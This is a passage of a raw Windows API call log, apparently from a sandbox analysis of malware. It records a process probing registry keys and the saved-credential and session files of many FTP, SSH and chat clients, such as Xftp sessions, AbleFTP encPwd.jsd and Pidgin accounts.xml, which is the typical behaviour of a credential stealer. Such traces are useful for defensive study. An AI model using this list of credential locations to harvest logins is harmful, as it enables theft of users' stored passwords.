(lpLibFileName="shlwapi") returned 0x77680000 [0127.866] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104) returned 0x2 [0127.866] GetProcessHeap () returned 0x6a0000 [0127.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.867] GetProcessHeap () returned 0x6a0000 [0127.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0127.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.869] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb90*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb90*=0x104) returned 0x2 [0127.869] GetProcessHeap () returned 0x6a0000 [0127.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.883] GetProcessHeap () returned 0x6a0000 [0127.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0127.884] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.884] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\.purple\\accounts.xml", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0127.885] GetProcessHeap () returned 0x6a0000 [0127.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b8b60 [0127.885] GetProcessHeap () returned 0x6a0000 [0127.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.887] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0127.887] GetProcessHeap () returned 0x6a0000 [0127.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8b60 | out: hHeap=0x6a0000) returned 1 [0127.908] GetProcessHeap () returned 0x6a0000 [0127.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.908] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.909] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0127.910] GetProcessHeap () returned 0x6a0000 [0127.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5a) returned 0x6bb458 [0127.911] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.911] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\SuperPutty", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0127.911] GetProcessHeap () returned 0x6a0000 [0127.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0127.912] GetProcessHeap () returned 0x6a0000 [0127.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.913] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0127.914] GetProcessHeap () returned 0x6a0000 [0127.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.914] GetProcessHeap () returned 0x6a0000 [0127.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.926] GetProcessHeap () returned 0x6a0000 [0127.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.927] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.927] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.927] GetProcessHeap () returned 0x6a0000 [0127.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bb458 [0127.928] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.929] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0127.929] GetProcessHeap () returned 0x6a0000 [0127.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0127.929] GetProcessHeap () returned 0x6a0000 [0127.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.931] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0127.931] GetProcessHeap () returned 0x6a0000 [0127.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.932] GetProcessHeap () returned 0x6a0000 [0127.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.933] GetProcessHeap () returned 0x6a0000 [0127.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f9a) returned 0x6bb458 [0127.935] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.937] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0127.937] GetProcessHeap () returned 0x6a0000 [0127.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa4) returned 0x6bac30 [0127.937] GetProcessHeap () returned 0x6a0000 [0127.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.940] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0127.940] GetProcessHeap () returned 0x6a0000 [0127.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.941] GetProcessHeap () returned 0x6a0000 [0127.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.941] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.942] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.942] GetProcessHeap () returned 0x6a0000 [0127.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bb458 [0127.942] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.943] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0127.943] GetProcessHeap () returned 0x6a0000 [0127.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0127.943] GetProcessHeap () returned 0x6a0000 [0127.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.959] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0127.960] GetProcessHeap () returned 0x6a0000 [0127.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.960] GetProcessHeap () returned 0x6a0000 [0127.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.960] GetProcessHeap () returned 0x6a0000 [0127.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0127.961] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.962] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0127.962] GetProcessHeap () returned 0x6a0000 [0127.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b7c60 [0127.962] GetProcessHeap () returned 0x6a0000 [0127.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.964] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0127.964] GetProcessHeap () returned 0x6a0000 [0127.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7c60 | out: hHeap=0x6a0000) returned 1 [0127.964] GetProcessHeap () returned 0x6a0000 [0127.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.965] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.966] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.966] GetProcessHeap () returned 0x6a0000 [0127.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f94) returned 0x6bb458 [0127.967] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.968] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0127.968] GetProcessHeap () returned 0x6a0000 [0127.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0127.968] GetProcessHeap () returned 0x6a0000 [0127.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.969] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0127.970] GetProcessHeap () returned 0x6a0000 [0127.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.970] GetProcessHeap () returned 0x6a0000 [0127.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.971] GetProcessHeap () returned 0x6a0000 [0127.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.971] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.972] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.972] GetProcessHeap () returned 0x6a0000 [0127.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f68) returned 0x6bb458 [0127.973] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.973] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0127.973] GetProcessHeap () returned 0x6a0000 [0127.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x6b9518 [0127.973] GetProcessHeap () returned 0x6a0000 [0127.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.975] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0127.976] GetProcessHeap () returned 0x6a0000 [0127.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.976] GetProcessHeap () returned 0x6a0000 [0127.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.977] GetProcessHeap () returned 0x6a0000 [0127.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.978] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.978] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.978] GetProcessHeap () returned 0x6a0000 [0127.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f82) returned 0x6bb458 [0127.979] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.980] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0127.980] GetProcessHeap () returned 0x6a0000 [0127.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6b9518 [0127.980] GetProcessHeap () returned 0x6a0000 [0127.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.982] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0127.982] GetProcessHeap () returned 0x6a0000 [0127.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.983] GetProcessHeap () returned 0x6a0000 [0127.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.983] GetProcessHeap () returned 0x6a0000 [0127.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bb458 [0127.984] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.985] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0127.985] GetProcessHeap () returned 0x6a0000 [0127.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b9518 [0127.985] GetProcessHeap () returned 0x6a0000 [0127.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.986] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0127.987] GetProcessHeap () returned 0x6a0000 [0127.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0127.987] GetProcessHeap () returned 0x6a0000 [0127.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.988] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.989] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0127.989] GetProcessHeap () returned 0x6a0000 [0127.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bb458 [0127.990] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.990] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0127.990] GetProcessHeap () returned 0x6a0000 [0127.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8960 [0127.990] GetProcessHeap () returned 0x6a0000 [0127.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.992] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0127.992] GetProcessHeap () returned 0x6a0000 [0127.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.993] GetProcessHeap () returned 0x6a0000 [0127.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8960 | out: hHeap=0x6a0000) returned 1 [0127.993] GetProcessHeap () returned 0x6a0000 [0127.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.994] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.024] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.024] GetProcessHeap () returned 0x6a0000 [0128.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bb458 [0128.025] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.025] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0128.026] GetProcessHeap () returned 0x6a0000 [0128.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b9518 [0128.026] GetProcessHeap () returned 0x6a0000 [0128.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.027] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0128.027] GetProcessHeap () returned 0x6a0000 [0128.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.028] GetProcessHeap () returned 0x6a0000 [0128.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.039] GetProcessHeap () returned 0x6a0000 [0128.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.040] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.040] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0128.040] GetProcessHeap () returned 0x6a0000 [0128.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb458 [0128.041] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.042] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\EasyFTP\\data", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0128.042] GetProcessHeap () returned 0x6a0000 [0128.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6b9518 [0128.042] GetProcessHeap () returned 0x6a0000 [0128.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.043] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0128.044] GetProcessHeap () returned 0x6a0000 [0128.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.044] GetProcessHeap () returned 0x6a0000 [0128.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.044] GetProcessHeap () returned 0x6a0000 [0128.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0128.044] GetProcessHeap () returned 0x6a0000 [0128.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0128.044] GetProcessHeap () returned 0x6a0000 [0128.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.045] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.045] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.045] GetProcessHeap () returned 0x6a0000 [0128.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb668 [0128.046] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.047] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\SftpNetDrive", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0128.047] GetProcessHeap () returned 0x6a0000 [0128.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x68) returned 0x6b9518 [0128.047] GetProcessHeap () returned 0x6a0000 [0128.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.048] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0128.048] GetProcessHeap () returned 0x6a0000 [0128.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.049] GetProcessHeap () returned 0x6a0000 [0128.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.049] GetProcessHeap () returned 0x6a0000 [0128.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.050] GetProcessHeap () returned 0x6a0000 [0128.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0128.050] GetProcessHeap () returned 0x6a0000 [0128.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.050] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.051] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0128.051] GetProcessHeap () returned 0x6a0000 [0128.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.051] GetProcessHeap () returned 0x6a0000 [0128.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.052] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0128.053] GetProcessHeap () returned 0x6a0000 [0128.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.053] GetProcessHeap () returned 0x6a0000 [0128.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.054] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.054] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.054] GetProcessHeap () returned 0x6a0000 [0128.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.054] GetProcessHeap () returned 0x6a0000 [0128.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.056] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.056] GetProcessHeap () returned 0x6a0000 [0128.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.056] GetProcessHeap () returned 0x6a0000 [0128.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.057] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.057] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.057] GetProcessHeap () returned 0x6a0000 [0128.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.057] GetProcessHeap () returned 0x6a0000 [0128.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.066] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.066] GetProcessHeap () returned 0x6a0000 [0128.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.066] GetProcessHeap () returned 0x6a0000 [0128.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.068] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0128.068] GetProcessHeap () returned 0x6a0000 [0128.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.068] GetProcessHeap () returned 0x6a0000 [0128.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.069] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0128.069] GetProcessHeap () returned 0x6a0000 [0128.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.070] GetProcessHeap () returned 0x6a0000 